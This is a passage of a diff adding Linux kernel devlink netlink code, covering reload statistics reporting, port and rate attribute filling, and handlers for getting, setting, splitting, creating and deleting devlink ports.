++				   enum devlink_reload_limit limit, u32 value)
++{
++	struct nlattr *reload_stats_entry;
++
++	reload_stats_entry = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS_ENTRY);
++	if (!reload_stats_entry)
++		return -EMSGSIZE;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_STATS_LIMIT, limit) ||
++	    nla_put_u32(msg, DEVLINK_ATTR_RELOAD_STATS_VALUE, value))
++		goto nla_put_failure;
++	nla_nest_end(msg, reload_stats_entry);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, reload_stats_entry);
++	return -EMSGSIZE;
++}
++
++static int devlink_reload_stats_put(struct sk_buff *msg, struct devlink *devlink, bool is_remote)
++{
++	struct nlattr *reload_stats_attr, *act_info, *act_stats;
++	int i, j, stat_idx;
++	u32 value;
++
++	if (!is_remote)
++		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS);
++	else
++		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_REMOTE_RELOAD_STATS);
++
++	if (!reload_stats_attr)
++		return -EMSGSIZE;
++
++	for (i = 0; i <= DEVLINK_RELOAD_ACTION_MAX; i++) {
++		if ((!is_remote &&
++		     !devlink_reload_action_is_supported(devlink, i)) ||
++		    i == DEVLINK_RELOAD_ACTION_UNSPEC)
++			continue;
++		act_info = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_INFO);
++		if (!act_info)
++			goto nla_put_failure;
++
++		if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_ACTION, i))
++			goto action_info_nest_cancel;
++		act_stats = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_STATS);
++		if (!act_stats)
++			goto action_info_nest_cancel;
++
++		for (j = 0; j <= DEVLINK_RELOAD_LIMIT_MAX; j++) {
++			/* Remote stats are shown even if not locally supported.
++			 * Stats of actions with unspecified limit are shown
++			 * though drivers don't need to register unspecified
++			 * limit.
++			 */
++			if ((!is_remote && j != DEVLINK_RELOAD_LIMIT_UNSPEC &&
++			     !devlink_reload_limit_is_supported(devlink, j)) ||
++			    devlink_reload_combination_is_invalid(i, j))
++				continue;
++
++			stat_idx = j * __DEVLINK_RELOAD_ACTION_MAX + i;
++			if (!is_remote)
++				value = devlink->stats.reload_stats[stat_idx];
++			else
++				value = devlink->stats.remote_reload_stats[stat_idx];
++			if (devlink_reload_stat_put(msg, j, value))
++				goto action_stats_nest_cancel;
++		}
++		nla_nest_end(msg, act_stats);
++		nla_nest_end(msg, act_info);
++	}
++	nla_nest_end(msg, reload_stats_attr);
++	return 0;
++
++action_stats_nest_cancel:
++	nla_nest_cancel(msg, act_stats);
++action_info_nest_cancel:
++	nla_nest_cancel(msg, act_info);
++nla_put_failure:
++	nla_nest_cancel(msg, reload_stats_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_fill(struct sk_buff *msg, struct devlink *devlink,
++			   enum devlink_command cmd, u32 portid,
++			   u32 seq, int flags)
++{
++	struct nlattr *dev_stats;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_FAILED, devlink->reload_failed))
++		goto nla_put_failure;
++
++	dev_stats = nla_nest_start(msg, DEVLINK_ATTR_DEV_STATS);
++	if (!dev_stats)
++		goto nla_put_failure;
++
++	if (devlink_reload_stats_put(msg, devlink, false))
++		goto dev_stats_nest_cancel;
++	if (devlink_reload_stats_put(msg, devlink, true))
++		goto dev_stats_nest_cancel;
++
++	nla_nest_end(msg, dev_stats);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++dev_stats_nest_cancel:
++	nla_nest_cancel(msg, dev_stats);
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_notify(struct devlink *devlink, enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_NEW && cmd != DEVLINK_CMD_DEL);
++	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_fill(msg, devlink, cmd, 0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_port_attrs_put(struct sk_buff *msg,
++				     struct devlink_port *devlink_port)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++
++	if (!devlink_port->attrs_set)
++		return 0;
++	if (attrs->lanes) {
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_LANES, attrs->lanes))
++			return -EMSGSIZE;
++	}
++	if (nla_put_u8(msg, DEVLINK_ATTR_PORT_SPLITTABLE, attrs->splittable))
++		return -EMSGSIZE;
++	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_FLAVOUR, attrs->flavour))
++		return -EMSGSIZE;
++	switch (devlink_port->attrs.flavour) {
++	case DEVLINK_PORT_FLAVOUR_PCI_PF:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
++				attrs->pci_pf.controller) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_pf.pf))
++			return -EMSGSIZE;
++		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_pf.external))
++			return -EMSGSIZE;
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_VF:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
++				attrs->pci_vf.controller) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_vf.pf) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_VF_NUMBER, attrs->pci_vf.vf))
++			return -EMSGSIZE;
++		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_vf.external))
++			return -EMSGSIZE;
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_SF:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
++				attrs->pci_sf.controller) ||
++		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER,
++				attrs->pci_sf.pf) ||
++		    nla_put_u32(msg, DEVLINK_ATTR_PORT_PCI_SF_NUMBER,
++				attrs->pci_sf.sf))
++			return -EMSGSIZE;
++		break;
++	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
++	case DEVLINK_PORT_FLAVOUR_CPU:
++	case DEVLINK_PORT_FLAVOUR_DSA:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_NUMBER,
++				attrs->phys.port_number))
++			return -EMSGSIZE;
++		if (!attrs->split)
++			return 0;
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_GROUP,
++				attrs->phys.port_number))
++			return -EMSGSIZE;
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_SUBPORT_NUMBER,
++				attrs->phys.split_subport_number))
++			return -EMSGSIZE;
++		break;
++	default:
++		break;
++	}
++	return 0;
++}
++
++static int devlink_port_fn_hw_addr_fill(const struct devlink_ops *ops,
++					struct devlink_port *port,
++					struct sk_buff *msg,
++					struct netlink_ext_ack *extack,
++					bool *msg_updated)
++{
++	u8 hw_addr[MAX_ADDR_LEN];
++	int hw_addr_len;
++	int err;
++
++	if (!ops->port_function_hw_addr_get)
++		return 0;
++
++	err = ops->port_function_hw_addr_get(port, hw_addr, &hw_addr_len,
++					     extack);
++	if (err) {
++		if (err == -EOPNOTSUPP)
++			return 0;
++		return err;
++	}
++	err = nla_put(msg, DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR, hw_addr_len, hw_addr);
++	if (err)
++		return err;
++	*msg_updated = true;
++	return 0;
++}
++
++static int devlink_nl_rate_fill(struct sk_buff *msg,
++				struct devlink_rate *devlink_rate,
++				enum devlink_command cmd, u32 portid, u32 seq,
++				int flags, struct netlink_ext_ack *extack)
++{
++	struct devlink *devlink = devlink_rate->devlink;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_u16(msg, DEVLINK_ATTR_RATE_TYPE, devlink_rate->type))
++		goto nla_put_failure;
++
++	if (devlink_rate_is_leaf(devlink_rate)) {
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
++				devlink_rate->devlink_port->index))
++			goto nla_put_failure;
++	} else if (devlink_rate_is_node(devlink_rate)) {
++		if (nla_put_string(msg, DEVLINK_ATTR_RATE_NODE_NAME,
++				   devlink_rate->name))
++			goto nla_put_failure;
++	}
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_SHARE,
++			      devlink_rate->tx_share, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_MAX,
++			      devlink_rate->tx_max, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (devlink_rate->parent)
++		if (nla_put_string(msg, DEVLINK_ATTR_RATE_PARENT_NODE_NAME,
++				   devlink_rate->parent->name))
++			goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static bool
++devlink_port_fn_state_valid(enum devlink_port_fn_state state)
++{
++	return state == DEVLINK_PORT_FN_STATE_INACTIVE ||
++	       state == DEVLINK_PORT_FN_STATE_ACTIVE;
++}
++
++static bool
++devlink_port_fn_opstate_valid(enum devlink_port_fn_opstate opstate)
++{
++	return opstate == DEVLINK_PORT_FN_OPSTATE_DETACHED ||
++	       opstate == DEVLINK_PORT_FN_OPSTATE_ATTACHED;
++}
++
++static int devlink_port_fn_state_fill(const struct devlink_ops *ops,
++				      struct devlink_port *port,
++				      struct sk_buff *msg,
++				      struct netlink_ext_ack *extack,
++				      bool *msg_updated)
++{
++	enum devlink_port_fn_opstate opstate;
++	enum devlink_port_fn_state state;
++	int err;
++
++	if (!ops->port_fn_state_get)
++		return 0;
++
++	err = ops->port_fn_state_get(port, &state, &opstate, extack);
++	if (err) {
++		if (err == -EOPNOTSUPP)
++			return 0;
++		return err;
++	}
++	if (!devlink_port_fn_state_valid(state)) {
++		WARN_ON_ONCE(1);
++		NL_SET_ERR_MSG_MOD(extack, "Invalid state read from driver");
++		return -EINVAL;
++	}
++	if (!devlink_port_fn_opstate_valid(opstate)) {
++		WARN_ON_ONCE(1);
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Invalid operational state read from driver");
++		return -EINVAL;
++	}
++	if (nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_STATE, state) ||
++	    nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_OPSTATE, opstate))
++		return -EMSGSIZE;
++	*msg_updated = true;
++	return 0;
++}
++
++static int
++devlink_nl_port_function_attrs_put(struct sk_buff *msg, struct devlink_port *port,
++				   struct netlink_ext_ack *extack)
++{
++	const struct devlink_ops *ops;
++	struct nlattr *function_attr;
++	bool msg_updated = false;
++	int err;
++
++	function_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PORT_FUNCTION);
++	if (!function_attr)
++		return -EMSGSIZE;
++
++	ops = port->devlink->ops;
++	err = devlink_port_fn_hw_addr_fill(ops, port, msg, extack,
++					   &msg_updated);
++	if (err)
++		goto out;
++	err = devlink_port_fn_state_fill(ops, port, msg, extack, &msg_updated);
++out:
++	if (err || !msg_updated)
++		nla_nest_cancel(msg, function_attr);
++	else
++		nla_nest_end(msg, function_attr);
++	return err;
++}
++
++static int devlink_nl_port_fill(struct sk_buff *msg,
++				struct devlink_port *devlink_port,
++				enum devlink_command cmd, u32 portid, u32 seq,
++				int flags, struct netlink_ext_ack *extack)
++{
++	struct devlink *devlink = devlink_port->devlink;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
++		goto nla_put_failure;
++
++	/* Hold rtnl lock while accessing port's netdev attributes. */
++	rtnl_lock();
++	spin_lock_bh(&devlink_port->type_lock);
++	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_TYPE, devlink_port->type))
++		goto nla_put_failure_type_locked;
++	if (devlink_port->desired_type != DEVLINK_PORT_TYPE_NOTSET &&
++	    nla_put_u16(msg, DEVLINK_ATTR_PORT_DESIRED_TYPE,
++			devlink_port->desired_type))
++		goto nla_put_failure_type_locked;
++	if (devlink_port->type == DEVLINK_PORT_TYPE_ETH) {
++		struct net *net = devlink_net(devlink_port->devlink);
++		struct net_device *netdev = devlink_port->type_dev;
++
++		if (netdev && net_eq(net, dev_net(netdev)) &&
++		    (nla_put_u32(msg, DEVLINK_ATTR_PORT_NETDEV_IFINDEX,
++				 netdev->ifindex) ||
++		     nla_put_string(msg, DEVLINK_ATTR_PORT_NETDEV_NAME,
++				    netdev->name)))
++			goto nla_put_failure_type_locked;
++	}
++	if (devlink_port->type == DEVLINK_PORT_TYPE_IB) {
++		struct ib_device *ibdev = devlink_port->type_dev;
++
++		if (ibdev &&
++		    nla_put_string(msg, DEVLINK_ATTR_PORT_IBDEV_NAME,
++				   ibdev->name))
++			goto nla_put_failure_type_locked;
++	}
++	spin_unlock_bh(&devlink_port->type_lock);
++	rtnl_unlock();
++	if (devlink_nl_port_attrs_put(msg, devlink_port))
++		goto nla_put_failure;
++	if (devlink_nl_port_function_attrs_put(msg, devlink_port, extack))
++		goto nla_put_failure;
++	if (devlink_port->linecard &&
++	    nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX,
++			devlink_port->linecard->index))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure_type_locked:
++	spin_unlock_bh(&devlink_port->type_lock);
++	rtnl_unlock();
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_port_notify(struct devlink_port *devlink_port,
++				enum devlink_command cmd)
++{
++	struct devlink *devlink = devlink_port->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_PORT_NEW && cmd != DEVLINK_CMD_PORT_DEL);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_port_fill(msg, devlink_port, cmd, 0, 0, 0, NULL);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static void devlink_rate_notify(struct devlink_rate *devlink_rate,
++				enum devlink_command cmd)
++{
++	struct devlink *devlink = devlink_rate->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_RATE_NEW && cmd != DEVLINK_CMD_RATE_DEL);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_rate_fill(msg, devlink_rate, cmd, 0, 0, 0, NULL);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_cmd_rate_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink_rate *devlink_rate;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
++			enum devlink_command cmd = DEVLINK_CMD_RATE_NEW;
++			u32 id = NETLINK_CB(cb->skb).portid;
++
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_rate_fill(msg, devlink_rate, cmd, id,
++						   cb->nlh->nlmsg_seq,
++						   NLM_F_MULTI, NULL);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_cmd_rate_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_rate *devlink_rate = info->user_ptr[1];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_rate_fill(msg, devlink_rate, DEVLINK_CMD_RATE_NEW,
++				   info->snd_portid, info->snd_seq, 0,
++				   info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static bool
++devlink_rate_is_parent_node(struct devlink_rate *devlink_rate,
++			    struct devlink_rate *parent)
++{
++	while (parent) {
++		if (parent == devlink_rate)
++			return true;
++		parent = parent->parent;
++	}
++	return false;
++}
++
++static int devlink_nl_cmd_get_doit(struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
++			      info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_get_dumpit(struct sk_buff *msg,
++				     struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (idx < start) {
++			idx++;
++			devlink_put(devlink);
++			continue;
++		}
++
++		devl_lock(devlink);
++		err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
++				      NETLINK_CB(cb->skb).portid,
++				      cb->nlh->nlmsg_seq, NLM_F_MULTI);
++		devl_unlock(devlink);
++		devlink_put(devlink);
++
++		if (err)
++			goto out;
++		idx++;
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_cmd_port_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_PORT_NEW,
++				   info->snd_portid, info->snd_seq, 0,
++				   info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_port_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_port *devlink_port;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(devlink_port, &devlink->port_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_port_fill(msg, devlink_port,
++						   DEVLINK_CMD_NEW,
++						   NETLINK_CB(cb->skb).portid,
++						   cb->nlh->nlmsg_seq,
++						   NLM_F_MULTI, cb->extack);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_port_type_set(struct devlink_port *devlink_port,
++				 enum devlink_port_type port_type)
++
++{
++	int err;
++
++	if (!devlink_port->devlink->ops->port_type_set)
++		return -EOPNOTSUPP;
++
++	if (port_type == devlink_port->type)
++		return 0;
++
++	err = devlink_port->devlink->ops->port_type_set(devlink_port,
++							port_type);
++	if (err)
++		return err;
++
++	devlink_port->desired_type = port_type;
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++	return 0;
++}
++
++static int devlink_port_function_hw_addr_set(struct devlink_port *port,
++					     const struct nlattr *attr,
++					     struct netlink_ext_ack *extack)
++{
++	const struct devlink_ops *ops = port->devlink->ops;
++	const u8 *hw_addr;
++	int hw_addr_len;
++
++	hw_addr = nla_data(attr);
++	hw_addr_len = nla_len(attr);
++	if (hw_addr_len > MAX_ADDR_LEN) {
++		NL_SET_ERR_MSG_MOD(extack, "Port function hardware address too long");
++		return -EINVAL;
++	}
++	if (port->type == DEVLINK_PORT_TYPE_ETH) {
++		if (hw_addr_len != ETH_ALEN) {
++			NL_SET_ERR_MSG_MOD(extack, "Address must be 6 bytes for Ethernet device");
++			return -EINVAL;
++		}
++		if (!is_unicast_ether_addr(hw_addr)) {
++			NL_SET_ERR_MSG_MOD(extack, "Non-unicast hardware address unsupported");
++			return -EINVAL;
++		}
++	}
++
++	if (!ops->port_function_hw_addr_set) {
++		NL_SET_ERR_MSG_MOD(extack, "Port doesn't support function attributes");
++		return -EOPNOTSUPP;
++	}
++
++	return ops->port_function_hw_addr_set(port, hw_addr, hw_addr_len,
++					      extack);
++}
++
++static int devlink_port_fn_state_set(struct devlink_port *port,
++				     const struct nlattr *attr,
++				     struct netlink_ext_ack *extack)
++{
++	enum devlink_port_fn_state state;
++	const struct devlink_ops *ops;
++
++	state = nla_get_u8(attr);
++	ops = port->devlink->ops;
++	if (!ops->port_fn_state_set) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Function does not support state setting");
++		return -EOPNOTSUPP;
++	}
++	return ops->port_fn_state_set(port, state, extack);
++}
++
++static int devlink_port_function_set(struct devlink_port *port,
++				     const struct nlattr *attr,
++				     struct netlink_ext_ack *extack)
++{
++	struct nlattr *tb[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1];
++	int err;
++
++	err = nla_parse_nested(tb, DEVLINK_PORT_FUNCTION_ATTR_MAX, attr,
++			       devlink_function_nl_policy, extack);
++	if (err < 0) {
++		NL_SET_ERR_MSG_MOD(extack, "Fail to parse port function attributes");
++		return err;
++	}
++
++	attr = tb[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR];
++	if (attr) {
++		err = devlink_port_function_hw_addr_set(port, attr, extack);
++		if (err)
++			return err;
++	}
++	/* Keep this as the last function attribute set, so that when
++	 * multiple port function attributes are set along with state,
++	 * Those can be applied first before activating the state.
++	 */
++	attr = tb[DEVLINK_PORT_FN_ATTR_STATE];
++	if (attr)
++		err = devlink_port_fn_state_set(port, attr, extack);
++
++	if (!err)
++		devlink_port_notify(port, DEVLINK_CMD_PORT_NEW);
++	return err;
++}
++
++static int devlink_nl_cmd_port_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	int err;
++
++	if (info->attrs[DEVLINK_ATTR_PORT_TYPE]) {
++		enum devlink_port_type port_type;
++
++		port_type = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_TYPE]);
++		err = devlink_port_type_set(devlink_port, port_type);
++		if (err)
++			return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_PORT_FUNCTION]) {
++		struct nlattr *attr = info->attrs[DEVLINK_ATTR_PORT_FUNCTION];
++		struct netlink_ext_ack *extack = info->extack;
++
++		err = devlink_port_function_set(devlink_port, attr, extack);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++static int devlink_nl_cmd_port_split_doit(struct sk_buff *skb,
++					  struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++	u32 count;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_SPLIT_COUNT))
++		return -EINVAL;
++	if (!devlink->ops->port_split)
++		return -EOPNOTSUPP;
++
++	count = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_SPLIT_COUNT]);
++
++	if (!devlink_port->attrs.splittable) {
++		/* Split ports cannot be split. */
++		if (devlink_port->attrs.split)
++			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split further");
++		else
++			NL_SET_ERR_MSG_MOD(info->extack, "Port cannot be split");
++		return -EINVAL;
++	}
++
++	if (count < 2 || !is_power_of_2(count) || count > devlink_port->attrs.lanes) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Invalid split count");
++		return -EINVAL;
++	}
++
++	return devlink->ops->port_split(devlink, devlink_port, count,
++					info->extack);
++}
++
++static int devlink_nl_cmd_port_unsplit_doit(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (!devlink->ops->port_unsplit)
++		return -EOPNOTSUPP;
++	return devlink->ops->port_unsplit(devlink, devlink_port, info->extack);
++}
++
++static int devlink_port_new_notify(struct devlink *devlink,
++				   unsigned int port_index,
++				   struct genl_info *info)
++{
++	struct devlink_port *devlink_port;
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	lockdep_assert_held(&devlink->lock);
++	devlink_port = devlink_port_get_by_index(devlink, port_index);
++	if (!devlink_port) {
++		err = -ENODEV;
++		goto out;
++	}
++
++	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_NEW,
++				   info->snd_portid, info->snd_seq, 0, NULL);
++	if (err)
++		goto out;
++
++	return genlmsg_reply(msg, info);
++
++out:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_port_new_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink_port_new_attrs new_attrs = {};
++	struct devlink *devlink = info->user_ptr[0];
++	unsigned int new_port_index;
++	int err;
++
++	if (!devlink->ops->port_new || !devlink->ops->port_del)
++		return -EOPNOTSUPP;
++
++	if (!info->attrs[DEVLINK_ATTR_PORT_FLAVOUR] ||
++	    !info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]) {
++		NL_SET_ERR_MSG_MOD(extack, "Port flavour or PCI PF are not specified");
++		return -EINVAL;
++	}
++	new_attrs.flavour = nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_FLAVOUR]);
++	new_attrs.pfnum =
++		nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_PCI_PF_NUMBER]);
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		/* Port index of the new port being created by driver. */
++		new_attrs.port_index =
++			nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++		new_attrs.port_index_valid = true;
++	}
++	if (info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]) {
++		new_attrs.controller =
++			nla_get_u16(info->attrs[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER]);
++		new_attrs.controller_valid = true;
++	}
++	if (new_attrs.flavour == DEVLINK_PORT_FLAVOUR_PCI_SF &&
++	    info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]) {
++		new_attrs.sfnum = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_PCI_SF_NUMBER]);
++		new_attrs.sfnum_valid = true;
++	}
++
++	err = devlink->ops->port_new(devlink, &new_attrs, extack,
++				     &new_port_index);
++	if (err)
++		return err;
++
++	err = devlink_port_new_notify(devlink, new_port_index, info);
++	if (err && err != -ENODEV) {
++		/* Fail to send the response; destroy newly created port. */
++		devlink->ops->port_del(devlink, new_port_index, extack);
++	}
++	return err;
++}
++
++static int devlink_nl_cmd_port_del_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	unsigned int port_index;
++
++	if (!devlink->ops->port_del)
++		return -EOPNOTSUPP;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PORT_INDEX)) {
++		NL_SET_ERR_MSG_MOD(extack, "Port index is not specified");
++		return -EINVAL;
++	}
++	port_index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++	return devlink->ops->port_del(devlink, port_index, extack);
++}
++
++static int
++devlink_nl_rate_parent_node_set(struct devlink_rate *devlink_rate,
++				struct genl_info *info,
